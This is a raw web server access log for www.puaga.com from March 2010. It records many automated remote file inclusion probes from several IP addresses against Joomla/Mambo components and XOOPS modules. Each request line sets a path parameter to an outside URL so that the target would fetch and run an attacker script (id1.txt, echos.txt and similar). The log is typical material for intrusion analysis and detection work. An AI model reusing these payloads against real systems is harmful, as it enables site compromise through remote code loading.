193.137.208.199 - - [07/Mar/2010:04:22:50 -0800] "GET /components/com_securityimages/lang.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:22:50 -0800] "GET /logs/access_100208.log/components/com_securityimages/lang.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:22:50 -0800] "GET /logs/components/com_securityimages/lang.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [07/Mar/2010:04:23:04 -0800] "GET /logs/access_100129.log//main.php?sayfa=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [07/Mar/2010:04:23:11 -0800] "GET /logs/access_100129.log//main.php?sayfa=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:04:23:16 -0800] "GET /logs/access_100219.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [07/Mar/2010:04:23:23 -0800] "GET /logs/access_100220.log//main.php?sayfa=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [07/Mar/2010:04:23:25 -0800] "GET /logs/access_100220.log//main.php?sayfa=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:23:31 -0800] "GET /logs/access_100208.log%20%20/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [07/Mar/2010:04:25:16 -0800] "GET /logs//main.php?sayfa=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [07/Mar/2010:04:25:16 -0800] "GET /logs/access_100129.log//main.php?sayfa=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [07/Mar/2010:04:25:16 -0800] "GET /main.php?sayfa=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [07/Mar/2010:04:25:36 -0800] "GET /logs/access_100220.log//main.php?sayfa=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:27:37 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:27:37 -0800] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:27:37 -0800] "GET /logs/access_100203.log%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:27:51 -0800] "GET /logs/access_100208.log%20%20/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:28:05 -0800] "GET /logs/access_100208.log%20%20/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:28:07 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zlama.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:28:07 -0800] "GET /logs/access_100225.log%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:28:35 -0800] "GET /logs/access_100212.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zlama.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
84.38.160.77 - - [07/Mar/2010:04:28:53 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [07/Mar/2010:04:28:53 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [07/Mar/2010:04:28:53 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:29:24 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:29:32 -0800] "GET /logs/access_100203.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:29:32 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:29:56 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:29:56 -0800] "GET /logs/access_100203.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:29:56 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:30:06 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:30:06 -0800] "GET /logs/access_100203.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:30:06 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [07/Mar/2010:04:30:53 -0800] "GET /logs/access_100218.log/error.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [07/Mar/2010:04:30:57 -0800] "GET /logs/access_100209.log/error.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.160.77 - - [07/Mar/2010:04:31:10 -0800] "GET /logs/access_100211.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:31:25 -0800] "GET /logs/access_100209.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:31:25 -0800] "GET /logs/access_100203.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [07/Mar/2010:04:31:38 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [07/Mar/2010:04:31:39 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [07/Mar/2010:04:31:39 -0800] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:31:43 -0800] "GET /logs/access_100203.log%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:32:01 -0800] "GET /logs/access_100212.log%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:32:34 -0800] "GET /logs/access_100203.log%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:32:36 -0800] "GET /logs/access_100203.log%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [07/Mar/2010:04:33:45 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [07/Mar/2010:04:33:45 -0800] "GET /logs/access_100207.log%20%20//modules/xfsection/modify.php?dir_module=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [07/Mar/2010:04:33:51 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:33:57 -0800] "GET /logs/access_100212.log%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:34:14 -0800] "GET /logs/access_100212.log%20%20/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.208.78.90 - - [07/Mar/2010:04:34:39 -0800] "GET /logs/access_100204.log%20%20//modules/xfsection/modify.php?dir_module=http://www.flowerbine.com/shop/bbs//imgs/baner.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [07/Mar/2010:04:35:08 -0800] "GET /logs/access_100211.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:35:27 -0800] "GET /logs/access_100212.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:35:42 -0800] "GET /logs/components/com_securityimages/lang.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:35:42 -0800] "GET /components/com_securityimages/lang.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:35:42 -0800] "GET /logs/access_100208.log/components/com_securityimages/lang.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:36:51 -0800] "GET /logs/access_100208.log%20%20/components/com_securityimages/lang.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:37:18 -0800] "GET /logs/access_100208.log%20%20/components/com_securityimages/lang.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:37:30 -0800] "GET /logs/access_100211.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zlama.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:37:30 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zlama.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:37:30 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zlama.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:37:48 -0800] "GET /logs/access_100207.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zlama.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:39:53 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:39:53 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:39:53 -0800] "GET /logs/access_100211.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:40:29 -0800] "GET /logs/access_100207.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [07/Mar/2010:04:42:06 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [07/Mar/2010:04:42:06 -0800] "GET /logs/access_100213.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [07/Mar/2010:04:42:06 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
195.190.166.35 - - [07/Mar/2010:04:42:07 -0800] "GET /logs/access_100129.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:42:51 -0800] "GET /logs/access_100208.log%20%20/components/com_securityimages/lang.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:42:55 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [07/Mar/2010:04:43:01 -0800] "GET /logs/access_100213.log%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.65" "www.puaga.com"
84.38.160.77 - - [07/Mar/2010:04:44:08 -0800] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [07/Mar/2010:04:44:08 -0800] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
84.38.160.77 - - [07/Mar/2010:04:44:08 -0800] "GET /logs/access_100213.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:44:47 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:44:47 -0800] "GET /logs/access_100203.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:44:48 -0800] "GET /logs///components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://add-ons.co.uk///mambots/search/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:44:48 -0800] "GET //components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://add-ons.co.uk///mambots/search/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:45:09 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:45:12 -0800] "GET /logs/access_100208.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:45:12 -0800] "GET /logs/access_100219.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.38.160.77 - - [07/Mar/2010:04:45:19 -0800] "GET /logs/access_100213.log%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:45:29 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:45:29 -0800] "GET /logs/access_100227.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:45:30 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:45:32 -0800] "GET /logs/access_100227.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:45:32 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:45:34 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:45:42 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:45:42 -0800] "GET /logs/access_100211.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:45:43 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:45:48 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:45:49 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:45:49 -0800] "GET /logs/access_100211.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:46:02 -0800] "GET /logs/access_100208.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:46:10 -0800] "GET /logs/access_100208.log%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:47:15 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zlama.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:47:15 -0800] "GET /logs/access_100219.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zlama.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:47:15 -0800] "GET /logs/access_100208.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zlama.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:47:15 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zlama.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
174.142.61.173 - - [07/Mar/2010:04:47:38 -0800] "GET /logs/http://host/components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [07/Mar/2010:04:47:38 -0800] "GET /http://host/components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [07/Mar/2010:04:47:44 -0800] "GET /logs/access_100213.log/http://host/components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [07/Mar/2010:04:48:10 -0800] "GET /logs/access_100226.log/http://host/components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:49:19 -0800] "GET /logs/access_100207.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:49:37 -0800] "GET /logs/access_100207.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [07/Mar/2010:04:49:46 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [07/Mar/2010:04:49:46 -0800] "GET /logs/access_100225.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [07/Mar/2010:04:49:47 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.142.61.173 - - [07/Mar/2010:04:50:24 -0800] "GET /logs/access_100204.log%20%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bellangora.fr/language/x1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [07/Mar/2010:04:50:31 -0800] "GET /logs/access_100226.log/////?_SERVER[DOCUMENT_ROOT]=http://www.leaderpmc.com/banner/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.813" "www.puaga.com"
77.241.83.107 - - [07/Mar/2010:04:50:32 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.leaderpmc.com/banner/id.txt??? HTTP/1.1" 200 3642 "-" "libwww-perl/5.813" "www.puaga.com"
